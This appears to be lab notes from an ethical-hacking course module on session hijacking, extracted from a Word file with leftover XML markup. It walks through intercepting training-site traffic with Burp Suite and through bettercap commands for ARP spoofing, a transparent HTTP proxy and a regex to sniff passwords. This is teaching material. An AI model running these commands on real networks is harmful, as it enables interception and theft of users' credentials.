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Module 11: Session Hijacking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Session Hijacking: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type of attack where an attacker takes control of a user's active session by stealing or predicting session tokens or IDs.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It’s a form of attack where a bad actor steals or manipulates the session token to gain unauthorized access to information or services.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hijacking process typically begins when an attacker intercepts a token, which can be likened to a secret handshake between the user and the website. Once in possession of this token, the attacker gains the ability to masquerade as the legitimate user, potentially causing havoc.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Web Session Hijacking Using Burp Suit Tool :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Hacking sessions of Moviescope Site and redirecting it to goodshopping site which is hosted in window server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Operating system: Kali os &amp; Window Server 2019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Moviescope site is hosted in 2019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Tool: Burp Suite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b w:val="1"/>
          <w:color w:val="262626"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Steps: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In kali os, Open burpsuite tool &gt; open browser and browse “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rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.moviescope.com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” &gt; copy the url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Goto burp suite tool &gt; turn “intercept on” &gt; browse site “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rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.moviescope.com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Select “Moviescope ” word and replace it with “goodshopping” word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Then forward the traffic after changing word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The result is Session hijacking of the Moviescope site.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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Session Hijacking Using bettercap Tool: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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker/ Hijacker: Kali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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: bettercap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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target:  Site hosted in Server 2019 (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http://www.moviescope.com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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /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http://www.goodshopping.com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highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps:</w:t>
      </w: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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In kali os, goto terminal &gt; run cmd “ sudo bettercap -iface eth0 ” to open bettercap tool        //</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:i w:val="1"/>
          <w:color w:val="262626"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eth0 is interface to capture,  -iface for network interface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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In window 11, browse the site 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http://www.goodshopping.com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color w:val="26262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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Back to in kali terminal, run “ help” cmd for options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color w:val="26262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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run cmd “ net.sniff on”  // </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:i w:val="1"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to turn on sniffing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color w:val="26262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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run cmd “ arp.spoof.internal” // </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:i w:val="1"/>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to perform ARP spoofing on all hosts within the local Ethernet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b w:val="1"/>
          <w:color w:val="26262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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run cmd “set arp.spoof.targets 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&lt;target_IP_address&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="262626"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”  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//</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="262626"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to specify the IP addresses you want to spoof.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Run cmd “http.proxy on”  //</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:i w:val="1"/>
          <w:color w:val="262626"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sets up a full-featured HTTP transparent proxy that can intercept and modify HTTP traffic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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run cmd “ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="4a86e8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set net.sniff.regex '.*password=.' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="262626"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” //</w:t>
      </w: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 t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:i w:val="1"/>
          <w:color w:val="262626"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">o configure the packet sniffer to filter traffic that contains a specific pattern (in this case, it captures any line that includes "password=" followed by any characters).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2626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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyze results.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Note: open window 11 - login to site after listening from bettercap in kali os to sniff username &amp; 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5"/>
          <w:szCs w:val="25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goodshopping.com" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.goodshopping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oviescope.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescope.com" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescop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